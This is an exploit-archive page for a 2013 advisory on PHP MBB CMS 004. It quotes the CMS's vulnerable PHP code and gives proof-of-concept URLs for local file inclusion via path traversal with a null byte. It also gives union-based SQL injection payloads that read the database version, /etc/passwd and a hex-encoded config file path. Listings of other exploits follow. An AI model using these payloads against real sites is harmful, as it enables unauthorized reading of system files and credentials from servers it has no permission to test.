Menu

Search for hundreds of thousands of exploits

"PHP MBB CMS 004 - Multiple Vulnerabilities"

Author

Exploit author

cr4wl3r

Platform

Exploit platform

php

Release date

Exploit published date

2013-12-24

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
# MBB CMS <= 004 (LFI/SQLi) Multiple Vulnerability
# By cr4wl3r http://bastardlabs.info
# Script http://sourceforge.net/projects/phpmbbcms/
# Tested : Windows / Linux
# Dork   : N/A
###################################################
# LFI [ MBB_CMS/index.php ]
# .......
# 22 if(isset($_GET['mod'])){
# 23   $a=$_GET['mod'];
# 24   switch($a){
# 25    case $a:
# 26       if(file_exists("modul/$a/$a.php")){
# 27         include("modul/$a/$a.php");
# 28       }else{
# 29         include("site/main.php");
# 30       }
# 31     break;
# 32   }
# 33 }else{
# 34   $a=$_GET['ref'];
# 35   switch($a){
# 36 
# 37     case"login": logForm(); break;
# 38     case"logact": login(); break;
# 39     case"logout": logout(); break;
# 40 
# 41    case $a:
# 42       if(file_exists("site/$a.php")){
# 43         include("site/$a.php");
# 44       }else if(file_exists("site/$a/$a.php")){
# 45         include("site/$a/$a.php");
# 46       }else{
# 47         include("site/main.php");
# 48       }
# 49     break;
# .......
############################################################
 Proof of Concept
 http://127.0.0.1/[MBB_CMS]/?mod=[LFI]%00
 http://127.0.0.1/[MBB_CMS]/?ref=[LFI]%00
 http://127.0.0.1/[MBB_CMS]/?mod=../../../../../../../../../../../../../[file]%00
 http://127.0.0.1/[MBB_CMS]/?ref=../../../../../../../../../../../../../[file]%00

# SQLi [ MBB_CMS/modul/article/article.php ]
# ........
# 18 $id=$_GET['id'];
# 19 $query=mysql_query("select artikel_artikel.id,artikel_artikel.catid,artikel_cat.kategori 
#    from artikel_artikel join artikel_cat on artikel_artikel.catid=artikel_cat.id 
#    where artikel_artikel.id='$id'");
# ........
#
# .....
# 173 function category(){
# 174   $catid=$_GET['catid'];
# 175   @list($kategori)=mysql_fetch_array(mysql_query("select kategori from artikel_cat where id='$catid'"));
# .....
#################################
 Proof of Concept
 http://127.0.0.1/[MBB_CMS]/?mod=article&act=detail&id=[SQLi]
 http://127.0.0.1/[MBB_CMS]/?mod=article&act=category&catid=[SQLi]
 http://127.0.0.1/[MBB_CMS]/?mod=article&act=detail&id=adhan' union select 1,2,version(),4,5 and 'memang'='ganteng
 http://127.0.0.1/[MBB_CMS]/?mod=article&act=category&catid=adhan' union select 1,2,load_file('/etc/passwd'),4,5 and 'memang'='ganteng

# SQLi [MBB_CMS/site/page/page.php ]
# .......
# 92 $pid=$_GET['pid'];
# 93       @list($name)=mysql_fetch_array(mysql_query("select title from pages where pub='1' and id='$pid'"));
# ......
###########################################
 Proof of Concept
 http://127.0.0.1/[MBB_CMS]/?ref=page&pid=[SQLi]
 http://127.0.0.1/[MBB_CMS]/?ref=page&pid=adhan' union select 1,2,load_file(0x433a2f417070536572762f7777772f64656d6f2f7379732f636f6e6669672e706870),4,5 and 'memang'='ganteng
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2013-12-24 "PHP MBB CMS 004 - Multiple Vulnerabilities" webapps php cr4wl3r
2013-12-12 "KikChat - Local File Inclusion / Remote Code Execution" webapps php cr4wl3r
2013-08-02 "FunGamez - Arbitrary File Upload" webapps php cr4wl3r
2013-02-26 "Brewthology 0.1 - SQL Injection" webapps php cr4wl3r
2013-02-21 "RTTucson Quotations Database Script - Authentication Bypass" webapps php cr4wl3r
2013-02-21 "Web Cookbook - Multiple Vulnerabilities" webapps php cr4wl3r
2013-02-21 "PHPMyRecipes 1.2.2 - 'viewrecipe.php?r_id' SQL Injection" webapps php cr4wl3r
2013-02-14 "Ultra Light Forum - Persistent Cross-Site Scripting" webapps php cr4wl3r
2013-01-09 "Free Blog 1.0 - Multiple Vulnerabilities" webapps php cr4wl3r
2013-01-08 "E Sms Script - Multiple SQL Injections" webapps php cr4wl3r
2012-11-15 "ReciPHP 1.1 - SQL Injection" webapps php cr4wl3r
2012-10-18 "Amateur Photographer's Image Gallery - 'plist.php?albumid' SQL Injection" webapps php cr4wl3r
2012-10-18 "BSW Gallery - 'uploadpic.php' Arbitrary File Upload" webapps php cr4wl3r
2012-10-18 "Amateur Photographer's Image Gallery - 'plist.php?albumid' Cross-Site Scripting" webapps php cr4wl3r
2012-10-18 "Amateur Photographer's Image Gallery - 'fullscreen.php?albumid' SQL Injection" webapps php cr4wl3r
2012-10-18 "Amateur Photographer's Image Gallery - 'force-download.php?File' Information Disclosure" webapps php cr4wl3r
2012-10-17 "Sisfokol 4.0 - Arbitrary File Upload" webapps php cr4wl3r
2011-10-21 "SportsPHool 1.0 - Remote File Inclusion" webapps php cr4wl3r
2011-10-07 "BuzzyWall 1.3.2 - 'resolute.php' Information Disclosure" webapps php cr4wl3r
2010-06-11 "ardeacore 2.2 - Remote File Inclusion" webapps php cr4wl3r
2010-05-21 "Online Job Board - Authentication Bypass" webapps php cr4wl3r
2010-05-21 "Online University - Authentication Bypass" webapps php cr4wl3r
2010-05-03 "Gallo 0.1.0 - Remote File Inclusion" webapps php cr4wl3r
2010-05-02 "Openannuaire Openmairie Annuaire 2.00 - Local File Inclusion / Remote File Inclusion" webapps php cr4wl3r
2010-05-01 "Opencatalogue 1.024 - Local File Inclusion" webapps php cr4wl3r
2010-05-01 "Opencimetiere 2.01 - Multiple Remote File Inclusions" webapps php cr4wl3r
2010-04-29 "Scratcher - SQL Injection / Cross-Site Scripting" webapps php cr4wl3r
2010-04-26 "Opencourrier 2.03beta - Local File Inclusion / Remote File Inclusion" webapps php cr4wl3r
2010-04-26 "OpenCominterne 1.01 - Local File Inclusion" webapps php cr4wl3r
2010-04-24 "Openpresse 1.01 - Local File Inclusion" webapps php cr4wl3r
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.